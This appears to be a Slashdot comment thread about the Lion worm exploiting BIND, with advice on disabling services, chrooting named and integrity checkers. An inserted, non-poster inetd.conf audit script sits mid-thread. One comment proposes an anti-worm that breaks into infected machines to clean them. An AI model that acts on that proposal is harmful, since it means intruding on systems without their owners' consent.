The X Window System catches a lot of criticism, some of it well-deserved. Most of it, however, is purely inane. It works very well, all things considered. Most of the technological deficiencies (i.e., mainly rendering technology) are resolved with modern extensions. Naturally, there are better ways to do it. We could have a much better architecture. But that's all hindsight. What we're looking at is not a transition that would be based on advantages, but on disadvantages. Until the limitations of the X Window System outstrip the convenience of using what's already there and well-supported, we have X. But Xfree86 is good enough for now. There might be alternatives in the future (Berlin, http://www.berlin-consortium.org/ [berlin-consortium.org]).
I'm stumped. You determine that you need the CLI for some task while you're in the GUI. What better interface can you get than actually getting the CLI in the GUI? (Which is what Xterm does for you.)
They seem to have everything I need and want, and more. Filename completion (with cycling through potential matches), redirection (especially with file descriptors, as in bash), good line editing, conditions and looping, scripting, ... Maybe I'm thinking inside the box, but I can't think of anything that I've needed to do that hasn't been made easy (if not trivial) by some shell.
Well, it's not as if every UNIX uses the same file system. I don't understand this claim, really. Are you arguing against hierarchical file systems or against the file systems themselves?
It performs very well for me, as do Mozilla (http://www.mozilla.org [mozilla.org]) and Konqueror (Konqueror [konqueror.org]). There's a lot of hype around Opera (Opera [opera.com]), but I've never tried it. There are particular deficiencies in each of these, of course, but most of them perform the task of web browsing well enough. Not to forget, of course, Lynx (Lynx [browser.org]).
Anyway, there are legitimate issues. Standardized package management on Linux would be nice, ACLs/Capabilities would be nice... And I'm always up for a new Window Manager or Desktop Environment. I use Sawfish/GNOME (Sawfish, http://sawmill.sourceforge.net/ [sourceforge.net]; GNOME, http://www.gnome.org/ [gnome.org]). But, eh, keep complaining: anything that gets me new toys to play with can't be too bad.
/. presses about to fall over (too slanted!) (Score:3)
Re:tripwire (Score:2)
For single-vendor products (say Windows or Solaris), you can at least pretend that the vendor is a single source of information. The job that MS has done (shit poor) is one of the big reasons they get complained about so much.
But Linux has no single source of information, no single point of contact, and so forth. The best bet in this case is to run a major distribution (say RedHat, for the sake of argument), and check their web sites.
Is that a very good answer? Not really--it's only as good as the least of the Unix vendors. HP, for instance, patches security holes and the like so aggressively that even usenet is seldom ahead of them. Sun, on the other hand, is much slower, as is RedHat. Microsoft is appalling.
NO operating system has a single point of information that's up to date, unfortunately. The decentralised nature of Linux makes it worse than most (boo, hiss! He said something bad about Linux!!!!)
Bottom line is this: If you're going to run *ix of any flavour, get "the Unix Administrator's Handbook" (Evi Nemeth et al.) and start reading usenet. And depending on your need for security (i.e. how much data will you lose WHEN you get hacked), read at least the vendor's web site but ideally (sigh!) the sites for the individual services: wu-ftpd, sendmail, bind, and so on.
Yeah, it's a drag. That's security these days.
If you want proper security and you're not willing to unattach yourself from the 'net, then consider running OpenBSD, possibly on a cheap P-166 or something like that.
tripwire (Score:4)
I'm so glad to see that CmdrTaco is promoting the proliferation of Linux into the community of average (read: "most") computer users with such a supportive, nurturing, and positive comment such as this. The arrogant tone of the comment makes me want to advise all of my non-expert computer using friends to download Mandrake, install it with no help from a Linux expert (it's so easy you don't need one anyway), and then proceed to use and learn it without any help from anyone, since it's so easy and intuitive. And, of course they'll all know to install tripwire "or something" because it's just that obvious.
Thanks again, CmdrTaco; you are a true representative of the Linux community in everything you say and do.
Re:Use DJBDNS instead of BIND. (Score:2)
This implies that the small utilities do that one thing really well. Well, I suppose svscan does one thing really well: generate MB/sec of error messages when it sees something it doesn't like, something trivial like a wrongly-named directory or a rightly-named directory in the wrong place. Seriously, it's like it was coded to stress-test syslog so it has zero error checking...
--
News for geeks in Austin: www.geekaustin.org [geekaustin.org]
Re:Question from a total newbie (Score:2)
See my "bastille" comment a few posts up. If you're using a redhat-derivative (RH, Mandrake, etc.), look in /etc/init.d or /etc/rc/init.d for the shell scripts that turn things on and off (e.g. /etc/init.d/named stop). Editing /etc/inetd.conf or /etc/xinetd.conf to comment out or remove the ability of the inetd-superserver to start up a connection to service X is another approach. Also see the program "ntsysv" on RH derivatives that gives you easy access to the "what starts on boot" list (hint: you can safely uncomment most of that list :) ). Note that some services (e.g. bind) run on their own continuously and some run on an as-needed, connection-oriented basis from (x)inetd (e.g. telnet, ftp) and some can run either way (ftp, ssh), the exact methods for disabling them depend...
If you have an always on connection, consider getting a personal firewall (there are bazillions of them, I've had good luck with the Linksys (linksys.com) series of products, buy.com has good (sub $100 for some models) prices on them). Even if you end up ditching linux it'll make your windows/whatever boxen on the home lan more secure.
Long term, get yourself a good book on unix administration (the armadillo book from o'reilly is a good bet (author = aeleen frisch iirc)). Read the docs on the Linux Documentation Project, particularly the book-length opus on security and system performance tuning. (www.redhat.com/mirrors/LDP is usually the mirror I use, I _think_ the home url is www.linuxdoc.org). I know it seems like a mountain of information but give yourself 6 months or so and it'll all seem clear. (plus you can get a stable, reasonably lucrative job doing it if you devote enough time to becoming an admin to do it well).
regardless... (Score:5)
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
If you're a newbie, here's a partial list of things you don't need to install or have running on your new workstation: bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable...
The best policy is offering nothing, and only selectively opening up services as you need to. If you do have a machine that needs to provide a service, try to understand the service and the idiosyncrasies of the server program before you offer it, and keep tabs on updates...
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-by-default-installations" thought here...
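As an added example, not code from any poster in this thread, here is the inetd.conf audit the two "disable what you don't need" posts above describe, as a small POSIX sh script: it lists the services inetd would actually start, flags those running as root, and comments one out. The config contents are a constructed sample and the function names are mine; point INETD_CONF at a real /etc/inetd.conf (after backing it up) to audit a live box.

```shell
#!/bin/sh
# Added example: audit and disable services in an inetd.conf-style file.
# Format per line: service socket proto wait user program args ...
# Lines starting with "#" are disabled.

# Write a constructed sample resembling /etc/inetd.conf to the given path.
make_sample_conf() {
    cat > "$1" <<'EOF'
# inetd.conf (constructed sample, not a real system file)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
EOF
}

# Print the names of services inetd would start (skip blank/comment lines).
enabled_services() {
    awk '/^[[:space:]]*#/ || /^[[:space:]]*$/ { next } { print $1 }' "$1"
}

# Print enabled services whose user column (field 5) is root.
root_services() {
    awk '/^[[:space:]]*#/ || /^[[:space:]]*$/ { next } $5 == "root" { print $1 }' "$1"
}

# Comment out every enabled line for the named service.
# Returns 1 (and changes nothing) if the service is not currently enabled.
disable_service() {
    conf=$1; svc=$2
    enabled_services "$conf" | grep -qx "$svc" || return 1
    tmp=$(mktemp) || return 1
    awk -v s="$svc" '$1 == s && !/^[[:space:]]*#/ { print "#" $0; next } { print }' \
        "$conf" > "$tmp" && cat "$tmp" > "$conf"
    rm -f "$tmp"
}

# Stand-alone demo on a temporary copy of the sample (the real file is untouched).
INETD_CONF=${INETD_CONF:-$(mktemp)}
[ -s "$INETD_CONF" ] || make_sample_conf "$INETD_CONF"
echo "enabled: $(enabled_services "$INETD_CONF" | tr '\n' ' ')"
echo "running as root: $(root_services "$INETD_CONF" | tr '\n' ' ')"
```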
Re:regardless... (Score:5)
Look into the Bastille project (search freshmeat). It's intended to run on a virgin install IIRC, fixes security holes and tells you what it's doing and why.
Shouldn't that be : (Score:4)
LION worm HOWTO (Score:2)
a) basic server security concepts;
b) your distro's recent upgrades/patches (for the last two months);
c) reasons to run bind and how to do it safely.
Here's how to make your machine vulnerable to LION:
1) Install a Linux distro.
2) Install bind, but make sure you don't install a recent version! Recent versions won't let LION in!
3) Don't install any of your distro's security updates/patches.
4) Finally, connect this machine directly to the internet w/o a firewall -- it's crucial that people on the 'net be able to access your nameserver.
If you follow all these steps, your Linux machine is vulnerable to the "Lion" worm. If your Linux machine does not get infected, please review all the above steps and try again.
Re:tripwire (Score:2)
But here's my question, and what I hope you (or some other kind soul) will point me to: to me, as you suggested, it isn't "that obvious" why my machine may be insecure in oh so many ways. If I decide to turn on a bunch of other services, for example, my system will probably be exploitable as all hell. But where's the best place to find out about all this? Do I need to go to the web page for my ftp daemon, and another web page for sendmail, and some other web page for security alerts, and so on and so forth? Or are there a few pages that are pretty good about keeping your box secure?
After I'm done securing my system, I'll go fix those Netscape fonts. Should be pretty easy....
Re:rootness and capabilities (Score:2)
That is why it sucks, because it is too coarse grained.
The X Window System catches a lot of criticism, some of it well-deserved.
The biggest problem with X-windows is that it requires a powerful and intelligent terminal which then is treated like a dumb device. OS X has improved on this. (I gave up on berlin when they spent a few months implementing alpha transparency.)
What better interface can you get than actually getting the CLI in the GUI?
The CLI is completely unaware that there is a GUI out there. See XMLterm for the proper way to create a CLI inside a graphical user interface.
They seem to have everything I need and want, and more.
The main shells are missing a ton of things. Here's a simple one: Not remembering recently used files without full path qualification (something norton commander supported ten years ago). Here's another one: default configuration often sucks. I've used many and the default shell often has file completion off and history off. Not to talk about the whole backspace/delete rigamarole. Imagine what you would say if Microsoft Word started with the delete key disabled...
File system sucks
Are you arguing against hierarchical file systems or against the file systems themselves?
What I'm referring to here is the lack of user defined attributes on the file system, such as "this file can only be opened with application XYZ". Mainframes had those in the 60's, WinNT has user defined attributes, how long until *nix supports those by default?
But, eh, keep complaining: anything that gets me new toys to play with can't be too bad.
That's the point. Create an itch, then address it.
Re:rootness and capabilities (Score:2)
Ah ok. That makes it alright then.... (NOT)
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Predictable. The usual copout of the Linux user: Just download package XYZ.
Yeap, when you buy a car and it has no brakes, you don't go to the dealer and complain. No you simply walk over to Napa spare parts and download some new brakes. After all why should one assume that things should work out of the box?
That is how high the quality bar has been set by Linux dittoheads: if it doesn't work out of the box is your fault.
Re:rootness and capabilities (Score:2)
I see now the error of my ways. Cars require brakes, but an OS which is touted as the best medium size web server available does not require decent security or a decent file system... No siree, you need to download it from some place else, after all why would a web server need to be secure?
Re:rootness and capabilities (Score:2)
We are not talking here about some specialized mathematical simulation software. We are talking about the security model of an OS which is touted as the system of choice for web servers, or the delete/backspace keys, which, last I checked, are used often.
To you those things are optional, which only confirms my point: when Linux sucks, the dittoheads copout with "just add package XYZ".
Re:rootness and capabilities (Score:3)
This is one way in which Linux/Unix sucks. The security model is brain dead. It might look good compared to Windoze, but if you have ever used a mainframe you would know what I'm talking about.
Yet the Linux community seems more interested in pointing out the ways in which Linux is better than Windows instead of addressing real concerns with the *nix model... (Miguel de Icaza being the exception that proves the rule).
Here's a list
Flame away
Re:Virii, OS acceptance, and making fun (Score:2)
Re:Virii, OS acceptance, and making fun (Score:2)
Patch... (Score:4)
Kidding, kidding. But only half. Maybe not even half.
Re:/. presses about to fall over (too slanted!) (Score:2)
Linux is *not* an operating system, it's a kernel.
Re:regardless... (Score:2)
Well, yes and no. I know with a dial-up box, I'm less vulnerable to extended attacks (the evil cracker rooted my box, installed 12 backdoors, but couldn't find it again) and I'm more likely to notice an attack in progress (gee, the modem lights're blinking even though I'm not downloading anything).
However, that being said, dynamic IP "security" should be lumped into the same boat as "security through obscurity" -- all other things being equal, they help (admittedly, I'm stretching that "being equal" a bit to cover an equal amount of scrutiny for the obscured procedure as it would've gotten out in the open), but it's considered very bad form to rely on them as actual security.
No, use BIND *intelligently* instead (Score:2)
As for the latest (January 29) vulnerability (TSIG), and the worm that now exploits it, this is just yet another reason to run "named" unprivileged and chroot()'ed, and to keep up to date with advisories and patches...
As for the "$500 cash reward" for finding a security hole in djbdns, don't forget to read the fine print in the guarantee [cr.yp.to]: "My judgment is final as to what constitutes a security hole in djbdns". Feh!
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
Rather worryingly (Score:2)
It can be nasty.... (Score:2)
Re:rootness and capabilities (Score:2)
Look, go into the Services, right-click on one, select the "Log On" tab, then tell me what you see there.... yup, that's right. You can select what security context the process runs under, which carries all the associated rights and/or restrictions.
-------
-- russ
"You want people to think logically? ACK! Turn in your UID, you traitor!"
Re:rootness and capabilities (Score:3)
IIS creates a user, usually called IUSR_machinename, which is the process under which IIS runs. Therefore, if I restrict that user from accessing anything but the INETPUB directory, including utils like CMD.EXE, system files, etc...., then even if someone can get in under that process, they won't be able to do much.
Then again, that's the flexibility you get when you have true file ACLs and can run services under separate security contexts.
Slashdot Spin Machine (Score:4)
Re:How is this a Linux problem? (Score:2)
Most NT/2000 admins add the end user of a workstation to the administrator group because most PC users are not used to dealing with file perms or a multiuser OS. This would be an expectation problem. (managing expectations is a bitch).
The problems with Outlook have been solved by adding a warning box.
In either case mentioned above a hostile program, run by an end user, can change *any* system file it wants to. This would not be possible on an OS based on Unix.
2.) This is a BIND problem that only affects x86 linux platforms because that is what the binaries of the rootkit were compiled for. This problem could potentially affect every *nix AND win32 based system that runs BIND. The main problem here is that BIND runs as root. This situation can be fixed by: upgrading to a newer version of BIND, by running djbdns, by running a chrooted BIND, etc.
LAME!! (Score:4)
Why would I want to run a closed source worm on my system???
Tripwirelike product (Score:3)
FreeVeracity [freeveracity.org]
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good.
Worms and Anti-worms (Score:2)
(LionFind) has been released. So, I have to ask... why not write LionFind so it can break into machines infected by Lion through the security hole created by Lion, inform the machine's owner, close the hole, and then use that box to look for the next box to disinfect?
-G.
--
Signature temporarily unavailable. Please try again.
Everybody should have seen it coming... (Score:2)